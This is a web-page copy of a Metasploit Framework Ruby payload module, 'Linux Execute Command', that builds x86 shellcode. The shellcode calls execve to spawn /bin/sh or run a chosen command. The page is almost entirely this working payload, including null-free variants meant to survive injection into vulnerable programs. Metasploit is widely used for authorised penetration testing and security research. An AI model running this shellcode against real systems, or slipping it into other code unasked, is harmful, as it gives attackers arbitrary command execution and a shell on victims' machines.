Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/x86/exec.rb
Views: 11782
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45###6#7# Exec8# ----9#10# Executes an arbitrary command.11#12###13module MetasploitModule1415CachedSize = 431617include Msf::Payload::Single18include Msf::Payload::Linux1920def initialize(info = {})21super(merge_info(info,22'Name' => 'Linux Execute Command',23'Description' => 'Execute an arbitrary command or just a /bin/sh shell',24'Author' => ['vlad902',25'Geyslan G. Bem <geyslan[at]gmail.com>'],26'License' => MSF_LICENSE,27'References' => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm'],28['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm'] ],29'Platform' => 'linux',30'Arch' => ARCH_X8631))3233# Register exec options34register_options(35[36OptString.new('CMD', [ false, "The command string to execute" ]),37])38register_advanced_options(39[40OptBool.new('NullFreeVersion', [ true, "Null-free shellcode version", false ])41])42end4344def generate(opts={})45cmd = datastore['CMD'] || ''46nullfreeversion = datastore['NullFreeVersion']47if cmd.empty?48#49# Builds the exec payload which executes a /bin/sh shell.50# execve("/bin/sh", NULL, NULL)51#52if nullfreeversion53# 21 bytes (null-free)54payload = <<-EOS55xor ecx, ecx ; ecx = NULL56mul ecx ; eax and edx = NULL57mov al, 0xb ; execve syscall58push ecx ; string '\0'59push 0x68732f2f ; "//sh"60push 0x6e69622f ; "/bin"61mov ebx, esp ; pointer to "/bin//sh\0" cmd62int 0x80 ; bingo63EOS64else65# 20 bytes (not null-free)66payload = <<-EOS67xor ecx, ecx ; ecx = NULL68mul ecx ; eax and edx = NULL69mov al, 0xb ; execve syscall70push 0x0068732f ; "/sh\0"71push 0x6e69622f ; "/bin"72mov ebx, esp ; pointer to "/bin/sh\0" cmd73int 0x80 ; bingo74EOS75end76else77#78# Dynamically builds the exec payload based on the user's options.79# execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)80#81pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)82if nullfreeversion83if cmd.length > 0xffff84raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()85end86if cmd.length <= 0xff # 25587breg = "bl"88else89breg = "bx"90if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes91cmd += " "92end93end94mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"95# 47/49 bytes without cmd (null-free)96payload = <<-EOS97xor ebx, ebx98mul ebx99mov al, 0xb100push edx101#{pushw_c_opt} ; "-c"102mov edi, esp103jmp tocall ; jmp/call/pop cmd address104afterjmp:105pop esi ; pop cmd address into esi106#{mov_cmd_len_to_breg} ; mov (byte/word) (bl/bx), cmd.length107mov [esi+ebx], dl ; NUL '\0' terminate cmd108push edx109push 0x68732f2f ; "//sh"110push 0x6e69622f ; "/bin"111mov ebx, esp112push edx113push esi114push edi115push ebx116mov ecx, esp117int 0x80118tocall:119call afterjmp ; call/pop cmd address120db "#{cmd}"121EOS122else123# 36 bytes without cmd (not null-free)124payload = <<-EOS125push 0xb126pop eax127cdq128push edx129#{pushw_c_opt} ; "-c"130mov edi, esp131push 0x0068732f ; "/sh\0"132push 0x6e69622f ; "/bin"133mov ebx, esp134push edx135call continue136db "#{cmd}", 0x00137continue:138push edi139push ebx140mov ecx, esp141int 0x80142EOS143end144end145Metasm::Shellcode.assemble(Metasm::Ia32.new, payload).encode_string146end147end148149150